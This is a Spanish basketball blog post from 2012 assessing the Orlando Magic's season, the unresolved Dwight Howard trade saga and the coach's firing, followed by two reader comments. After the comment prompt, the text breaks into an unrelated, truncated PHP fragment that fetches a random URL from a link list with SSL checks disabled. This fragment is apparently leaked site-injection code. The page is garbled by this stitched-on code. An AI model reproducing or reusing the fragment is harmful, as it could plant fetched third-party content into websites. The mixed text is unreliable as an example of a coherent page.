Orlando Magic: Aprobado

13 de July de 2012 por TheDeerHunter

Temporada marcada por el culebrón Dwight Howard que, a fecha de hoy, todavía no ha sido resuelto. Requiere un esfuerzo mental considerable repasar cuándo y cómo empezó todo, más si cabe si tenemos en cuenta los múltiples cambios de rumbo asociados a la volatilidad emocional del jugador. No podemos recordar un caso semejante.

En nuestro análisis de inicio de curso, fechado a 28 de diciembre (y no íbamos de coña) ya comentábamos las abiertas intenciones del jugador por abandonar la franquicia. Luego fue que no, luego que sí, que si un año más, que si su lealtad con ellos era inquebrantable (para hilaridad de más de uno), que si de los Nets de toda la vida oiga… En ese plan hasta hoy.

A todo esto la franquicia ha demostrado una admirable templanza respecto a esta situación. Cara de póker y a esperar acontecimientos, en una posición de fuerza que muchos dudábamos que fueran capaces de ejercer. Caiga quien caiga el objetivo de los Magic es sacar tajada a pesar de arriesgarse seriamente a terminar perdiendo al jugador al final de su contrato. Apuestan fuerte porque saben que quien lo quiera antes terminará cediendo y poniendo elementos interesantes encima de la mesa. Aún están en condiciones de alcanzar un acuerdo satisfactorio para ellos. El problema sigue siendo mantener la planificación deportiva paralizada hasta que se resuelva. Lo que te rondaré, morena.

Por no haber no hay ni técnico. Desconcertó un tanto la salida de Stan Van Gundy en el contexto de salida de Howard. Su cabeza era deseo expreso de Supermán y tiene menos sentido a estas alturas. Muchos le señalan como principal responsable de la última final perdida, por aquel lío que se armó con los bases entonces. En realidad lo que más se le reprocha es no haber dado con la tecla para darle un mayor protagonismo ofensivo a su mejor hombre, aunque habría que plantearse hasta qué punto tiene la culpa la evolución técnica del susodicho. Por otro lado parece que allí nadie se cuestiona cómo se ha gestionado la plantilla desde el subcampeonato, con decisiones difícilmente entendibles. El trabajo de Van Gundy ha sido como mínimo digno hasta el mismo día de su despido, con un carácter defensivo adquirido que para sí querrían muchos.

En medio de todas estas tribulaciones casi pasa a segundo plano el análisis deportivo de la campaña pasada que, recordemos, finalizó sin la presencia del protagonista principal. Poco que reprocharles. Con Howard apostábamos que caían en primera ronda, sin él incluso lucharon por pasar. Loable rendimiento de Glenn Davis y Jameer Nelson y un punto decepcionante de el tramo final de Anderson tras una gran campaña. De Turkoglu poco esperábamos ya. Con todo allí tiene el cartel de transferible hasta el utillero. Se avecinan cambios, como es natural.

Lo mejor: La imagen ofrecida en postemporada, sin Howard.

Lo peor: Soportar los vaivenes de la estrella de turno. Las franquicias deberían de estar por encima de todo esto. La incógnita de la reconstrucción que llega.

Jugando a GM:

A día de hoy es todo un ejercicio de especulación. A excepción de Glen Davis y, posiblemente Ayón, todos están en situación de interinidad.

– Procuraría, en la medida de lo posible, cerrar la operación Howard en este momento. Entrar al nuevo curso con el deadline de Febrero en mente es una pesadilla. De momento las negociaciones con los Nets han llegado a un punto muerto. Necesitaban la intervención de un tercer equipo y no encontraron a nadie que quisiera hacerse con Kris Humphries. Además, Brook Lopez ya ha renovado por los Nets y no puede ser traspasado hasta enero. Lakers y Rockets entran en escena, aunque los tejanos no tienen la renovación de Howard asegurada.

– En el draft los Magic han drafteado a 2 jugadores interiores: Andrew Nicholson y Kyle O’Quinn están dejando buenas sensaciones en las ligas de verano y podrían jugar un papel importante en caso de que Howard abandonara la franquicia y los objetivos de los Magic bajaran drásticamente.

– Trataría de renovar tanto a Nelson como a Redick. Obviamente no a cualquier precio.

Poco más podemos decir sin conocer cómo se cierra el tema principal.

Comenta

2 comentarios a esta entrada

  1. Nacho dice:
    #1

    Los he visto poco esta temporada, pero lo de PO fue impresionante. Un equipo condenado por todo el mundo, sin su estrellita estúpida, dando lecciones de garra y de saber estar, y un poco de suerte (en cuestión de jugadores acertados) y los Pacers temblando.
    Buen análisis, y me da que no están tan vacíos como muchos creen, y que están jugando sus cartas Howard muy bien. Otra cosa es que les salga.

      Citar

  2. simon dice:
    #2

    Lo cierto y verdad es que para lo que están ofreciendo siempre están a tiempo incluso el verano que viene con un sing and trade… para traer a Lopez que es un buen center en ataque pero en defensa nada de nada con un contratazo te asegura estar en los infiernos del Este mucho tiempo. en ese aspecto yo creo que la mejor baza de Magic es decir a Howard te vas en la agencia libre y tendras que firmar por menos dinero y nada de Nets, aunque el año que viene habrá muchos equipos con espacio para gastar.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>